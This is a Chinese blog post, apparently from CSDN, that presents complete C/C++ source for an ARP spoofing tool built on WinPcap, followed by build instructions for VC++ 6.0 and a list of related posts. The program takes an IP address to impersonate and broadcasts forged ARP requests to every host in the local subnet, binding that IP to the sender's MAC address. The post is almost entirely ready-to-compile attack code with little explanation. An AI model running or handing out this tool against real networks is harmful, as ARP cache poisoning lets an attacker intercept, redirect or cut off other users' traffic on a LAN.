ARP欺骗源代码(基于WinPcap实现)

最新推荐文章于 2024-06-13 16:11:45 发布
最新推荐文章于 2024-06-13 16:11:45 发布
阅读量1.1w 收藏 26
点赞数 5
分类专栏: 网络通信 C/C++ 文章标签: include struct preprocessor null authentication interface 
//ArpCheat.h 

#ifndef MY_ARP_CHEAT_INCLUDE_H 
#define MY_ARP_CHEAT_INCLUDE_H 

//字节对齐必须是1 
#pragma pack (1) 
struct ethernet_head 
{ 
unsigned char dest_mac[6]; //目标主机MAC地址 
unsigned char source_mac[6]; //源端MAC地址 
unsigned short eh_type; //以太网类型 
}; 

struct arp_head 
{ 
unsigned short hardware_type; //硬件类型:以太网接口类型为1 
unsigned short protocol_type; //协议类型:IP协议类型为0X0800 
unsigned char add_len; //硬件地址长度:MAC地址长度为6B 
unsigned char pro_len; //协议地址长度:IP地址长度为4B 
unsigned short option; //操作:ARP请求为1,ARP应答为2 
unsigned char sour_addr[6]; //源MAC地址:发送方的MAC地址 
unsigned long sour_ip; //源IP地址:发送方的IP地址 
unsigned char dest_addr[6]; //目的MAC地址:ARP请求中该字段没有意义;ARP响应中为接收方的MAC地址 
unsigned long dest_ip; //目的IP地址:ARP请求中为请求解析的IP地址;ARP响应中为接收方的IP地址
unsigned char padding[18]; 
}; 

struct arp_packet //最终arp包结构 
{ 
ethernet_head eth; //以太网头部 
arp_head arp; //arp数据包头部 
}; 
#pragma pack () 
/** 
* 获得网卡的MAC地址 
* pDevName 网卡的设备名称 
*/ 
unsigned char* GetSelfMac(char* pDevName); 
/** 
* 封装ARP请求包 
* source_mac 源MAC地址 
* srcIP 源IP 
* destIP 目的IP 
*/ 
unsigned char* BuildArpPacket(unsigned char* source_mac, 

unsigned long srcIP, unsigned long destIP); 

#endif



//ArpCheat.cpp 
#include <stdio.h> 
#include <pcap.h> 
#include <conio.h> 
#include <packet32.h> 
#include <ntddndis.h> 
#include "ArpCheat.h" 

int main(int argc,char* argv[]){ 
pcap_if_t *alldevs; //全部网卡列表 
pcap_if_t *d; //一个网卡 
int inum; //用户选择的网卡序号 
int i=0; //循环变量 
pcap_t *adhandle; //一个pcap实例 
char errbuf[PCAP_ERRBUF_SIZE]; //错误缓冲区 
unsigned char *mac; //本机MAC地址 
unsigned char *packet; //ARP包 
unsigned long fakeIp; //要伪装成的IP地址 
pcap_addr_t *pAddr; //网卡地址 
unsigned long ip; //IP地址 
unsigned long netmask; //子网掩码 

if(argc!=2){ 
printf("Usage: %s inet_addr\n",argv[0]); 
return -1; 
} 

//从参数列表获得要伪装的IP地址 
fakeIp = inet_addr(argv[1]); 
if(INADDR_NONE==fakeIp){ 
fprintf(stderr,"Invalid IP: %s\n",argv[1]); 
return -1; 
} 

/* 获得本机网卡列表 */ 
if (pcap_findalldevs_ex(PCAP_SRC_IF_STRING, NULL, &alldevs, errbuf) == -1) 
{ 
fprintf(stderr,"Error in pcap_findalldevs: %s\n", errbuf); 
exit(1); 
} 

/* 打印网卡列表 */ 
for(d=alldevs; d; d=d->next) 
{ 
printf("%d", ++i); 
if (d->description) 
printf(". %s\n", d->description); 
else 
printf(". No description available\n"); 
} 
//如果没有发现网卡 
if(i==0) 
{ 
printf("\nNo interfaces found! Make sure WinPcap is installed.\n"); 
return -1; 
} 
//请用户选择一个网卡 
printf("Enter the interface number (1-%d):",i); 
scanf("%d", &inum); 

//如果用户选择的网卡序号超出有效范围,则退出 
if(inum < 1 || inum > i) 
{ 
printf("\nInterface number out of range.\n"); 
/* Free the device list */ 
pcap_freealldevs(alldevs); 
return -1; 
} 




/* 移动指针到用户选择的网卡 */ 
for(d=alldevs, i=0; i< inum-1 ;d=d->next, i++); 

mac = GetSelfMac(d->name+8); //+8以去掉"rpcap://" 

printf("发送ARP欺骗包,本机(%.2X-%.2X-%.2X-%.2X-%.2X-%.2X) 试图伪装成%s\n", 
mac[0],mac[1],mac[2],mac[3],mac[4],mac[5],argv[1]); 



/* 打开网卡 */ 
if ( (adhandle= pcap_open(d->name, // name of the device 
65536, // portion of the packet to capture 
0, //open flag 
1000, // read timeout 
NULL, // authentication on the remote machine 
errbuf // error buffer 
) ) == NULL) 
{ 
fprintf(stderr,"\nUnable to open the adapter. %s is not supported by WinPcap\n", 
d->name); 
/* Free the device list */ 
pcap_freealldevs(alldevs); 
return -1; 
} 

for(pAddr=d->addresses; pAddr; pAddr=pAddr->next){ 
//得到用户选择的网卡的一个IP地址 
ip = ((struct sockaddr_in *)pAddr->addr)->sin_addr.s_addr; 
//得到该IP地址对应的子网掩码 
netmask = ((struct sockaddr_in *)(pAddr->netmask))->sin_addr.S_un.S_addr; 
if (!ip || !netmask){ 
continue; 
} 
//看看这个IP和要伪装的IP是否在同一个子网 
if((ip&netmask)!=(fakeIp&netmask)){ 
continue; //如果不在一个子网,继续遍历地址列表 
} 

unsigned long netsize = ntohl(~netmask); //网络中主机数
unsigned long net = ip & netmask; //子网地址 

for(unsigned long n=1; n<netsize; n++){ 
//第i台主机的IP地址,网络字节顺序 
unsigned long destIp = net | htonl(n); 
//构建假的ARP请求包,达到本机伪装成给定的IP地址的目的 
packet = BuildArpPacket(mac,fakeIp,destIp); 
if(pcap_sendpacket(adhandle, packet, 60)==-1){ 
fprintf(stderr,"pcap_sendpacket error.\n"); 
} 
} 

} 

return 0; 
} 
/** 
* 获得网卡的MAC地址 
* pDevName 网卡的设备名称 
*/ 
unsigned char* GetSelfMac(char* pDevName){ 

static u_char mac[6]; 

memset(mac,0,sizeof(mac)); 

LPADAPTER lpAdapter = PacketOpenAdapter(pDevName); 

if (!lpAdapter || (lpAdapter->hFile == INVALID_HANDLE_VALUE)) 
{ 
return NULL; 
} 

PPACKET_OID_DATA OidData = (PPACKET_OID_DATA)malloc(6 + sizeof(PACKET_OID_DATA)); 
if (OidData == NULL) 
{ 
PacketCloseAdapter(lpAdapter); 
return NULL; 
} 
// 
// Retrieve the adapter MAC querying the NIC driver 
// 
OidData->Oid = OID_802_3_CURRENT_ADDRESS; 

OidData->Length = 6; 
memset(OidData->Data, 0, 6); 
BOOLEAN Status = PacketRequest(lpAdapter, FALSE, OidData); 
if(Status) 
{ 
memcpy(mac,(u_char*)(OidData->Data),6); 
} 
free(OidData); 
PacketCloseAdapter(lpAdapter); 
return mac; 

} 

/** 
* 封装ARP请求包 
* source_mac 源MAC地址 
* srcIP 源IP 
* destIP 目的IP 
*/ 
unsigned char* BuildArpPacket(unsigned char* source_mac, 
unsigned long srcIP,unsigned long destIP) 
{ 
static struct arp_packet packet; 

//目的MAC地址为广播地址,FF-FF-FF-FF-FF-FF 
memset(packet.eth.dest_mac,0xFF,6); 
//源MAC地址 
memcpy(packet.eth.source_mac,source_mac,6); 
//上层协议为ARP协议,0x0806 
packet.eth.eh_type = htons(0x0806); 

//硬件类型,Ethernet是0x0001 
packet.arp.hardware_type = htons(0x0001); 
//上层协议类型,IP为0x0800 
packet.arp.protocol_type = htons(0x0800); 
//硬件地址长度:MAC地址长度为0x06 
packet.arp.add_len = 0x06; 
//协议地址长度:IP地址长度为0x04 
packet.arp.pro_len = 0x04; 
//操作:ARP请求为1 
packet.arp.option = htons(0x0001); 
//源MAC地址 
memcpy(packet.arp.sour_addr,source_mac,6); 
//源IP地址 
packet.arp.sour_ip = srcIP; 
//目的MAC地址,填充0 
memset(packet.arp.dest_addr,0,6); 
//目的IP地址 
packet.arp.dest_ip = destIP; 
//填充数据,18B 
memset(packet.arp.padding,0,18); 

return (unsigned char*)&packet; 
}


VC++ 6.0 中使用WinPcap
下载并安装WinPcap,安装之后在目录”C:\WINDOWS\system32“下WinPcap添加了Packet.dll、wpcap.dll。
增加WinPcap的include和lib路径:
Tools→Options→Directories,其中include文件的路径增加WinPcap的include路径(其中有pcap.h等头文件),library文件的路径增加WinPcap的lib路径(其中有Packet.lib和wpcap.lib)。
增加项目的静态链接库:
Project→Settings→Link→Object/library Modules,在文本框的末尾添加”wpcap.lib packet.lib ws2_32.lib“。
增加预编译信息:
Project→Settings→C/C++→Preprocessor definitions,在文本框的末尾添加”WPCAP,HAVE_REMOTE“。

baggiowangyu
关注
  • 5
    点赞
  • 26
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
arp欺骗简单实现
11-13
找了很久,基于winpcap的c程序arp欺骗代码,亲自试过绝对能用。
ARP欺骗源代码
weixin_33967071的博客
10-13 300
#include &lt;stdlib.h&gt;#include &lt;stdio.h&gt;#include &lt;pcap.h&gt; //winpcap的头文件#include &lt;winsock2.h&gt;#include &lt;process.h&gt; //多线程编程的头文件#include &lt;windows.h&gt;#include &lt;Iphlpapi.h...
ARP欺骗(详解)
最新发布
qq_70584783的博客
06-13 658
ARP欺骗(ARP spoofing),也称为ARP毒化或ARP攻击,是一种针对以太网地址解析协议(ARP)的恶意技术。该攻击手法主要发生在局域网(LAN)环境中,其目的是通过篡改网络设备上的ARP缓存表,来误导数据包的流向,从而实现对网络通信的控制、窃听或阻断。
学习笔记——C++实现ARP欺骗
Think88666的博客
01-31 2472
以下代码大体上是没有问题的,可以根据自己的一些需求进行修改! 谢谢指正错误 在课设期间,从网上学习了简单的实现ARP欺骗 ARP欺骗的原理很简单:通过不断的向目标发送ARP包,致使目标主机的ARP缓存表中正确的IP映射的是错误的MAC地址 在书上的介绍中,采用了WinPcap的开发包,这样很方便的对网卡进行操作 所以,首先需要安装winpacp,并下载开发者包https://www......
ARP攻击原理和kali实现ARP攻击
热门推荐
cuttleKK的博客
10-28 1万+
目录一、ARP协议和ARP攻击1.ARP协议2.利用wireshark分析ARP数据包3.ARP攻击二、kali实现ARP攻击 一、ARP协议和ARP攻击 1.ARP协议 ARP协议,地址解析协议(Address Resolution Protocol),用来实现IP地址到物理地址的映射。 每一台主机都设有一个ARP高速缓存(ARP cache),里面有本局域网上的各主机和路由器的IP地址到硬件地址的映射表,主机如何获取这些地址的? 例如,主机A向本局域网上的某台主机B发送IP数据报时,要先在ARP高速缓存
ARP欺骗的简单实现
qq_41699991的博客
12-02 6854
先瞎扯一波 说到ARP欺骗,就不得不提OSI模型,它的知识量过于巨大,我都学不过来(叹气),不过慢慢积累吧。 ARP协议(地址解析协议(英语:Address Resolution Protocol)是属于链路层的,很多东西我还不懂。。。 我先讲讲我对ARP欺骗的一些理解吧: 对于一台计算机来说,在错综复杂的网络世界,要识别它,有两个重要的识别卡,即“ip地址”和“MAC地址”,我把计算机就叫做小明...
WinPcap ARP欺骗简单源码
04-13
WinPcap.cpp文件是源代码的主要部分,其中包含了使用WinPcap API进行数据包捕获和注入的函数。开发者可能在这里定义了打开网络接口、设置过滤器、读取数据包以及发送自定义ARP包的函数。例如,`pcap_open_live()`...
基于WinpCap的局域网ARP工具.docx
12-07
这两篇文章提供了关于ARP原理、ARP欺骗及其利用WinpCap实现的深入讲解和示例代码。 4. **源码与下载** - **源码分享**:由于平台限制,源码无法直接上传,但提供了下载链接,用户可以通过给定的URL下载源代码以...
基于WinPcap的C# ARP欺骗软件(附源代码
05-05
【标题】"基于WinPcap的C# ARP欺骗软件(附源代码)"涉及的核心知识点主要集中在网络编程、WinPcap库以及C#语言的应用上。WinPcap是一个开源库,用于在Windows操作系统中捕获和传输网络数据包,它是网络分析和网络...
arp.rar_Arp delphi_arp_delphi arp_delphi winpcap
09-19
标题中的"arp.rar_Arp delphi_arp_delphi winpcap"揭示了这个压缩包包含的是与ARP协议相关的Delphi编程资源,特别是涉及到ARP欺骗实现。ARP(Address Resolution Protocol,地址解析协议)是TCP/IP协议栈中的一个...
ARP欺骗实现源代码与可执行文件(VC)
05-13
ARP欺骗实现,可对局域网主机进行ARP欺骗操作和欺骗解除操作,MFC界面。
ARP请求与接收解析C++源码
11-10
创建工程时需要先安装winpcap的驱动程序,并将winpcap开发包中的include、lib文件夹分别导入到我们工程的附加包含目录和附加库目录。
实现arp欺骗源代码以及详细解释
12-01
实现TCP/IP协议的网络环境下,一个ip包走到哪里,要怎么走是靠路由表定义,但是,当ip包到达该网络后,哪台机器响应这个ip包却是靠该ip包中所包含的硬件mac地址来识别。也就是说,只有机器的硬件mac地址和该ip包中的硬件mac地址相同的机器才会应答这个ip包,因为在网络中,每一台主机都会有发送ip包的时候,所以,在每台主机的内存中,都有一个 arp--> 硬件mac 的转换表。通常是动态的转换表(该arp表可以手工添加静态条目)。也就是说,该对应表会被主机在一定的时间间隔后刷新。这个时间间隔就是ARP高速缓存的超时时间。 通常主机在发送一个ip包之前,它要到该转换表中寻找和ip包对应的硬件mac地址,如果没有找到,该主机就发送一个ARP广播包,于是,主机刷新自己的ARP缓存。然后发出该ip包。
ARP协议的c语言实现源代码
03-07
ARP协议的c语言实现源代码
C++环境下发送ARP包
02-07
C++环境下发送arp包的例子,可以获取各个IP的MAC地址。 C++环境下发送arp包的例子,可以获取各个IP的MAC地址。
ARP欺骗
jzttly的博客
09-24 202
ARP欺骗
c++编写的arp程序
05-06
c++编写的arp程序,……………………………………………………………………
ARP C++实现源代码
zhongyhc的专栏
06-07 1594
转自:不变hi.baidu.com/wuxiaoming1733/blog/item/f7cebd191cfeb35a43a9ad92.html #ifndef MY_ARP_CHEAT_INCLUDE_H #define MY_ARP_CHEAT_INCLUDE_H //字节对齐必须是1 #pragma pack (1) struct ethernet_head
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值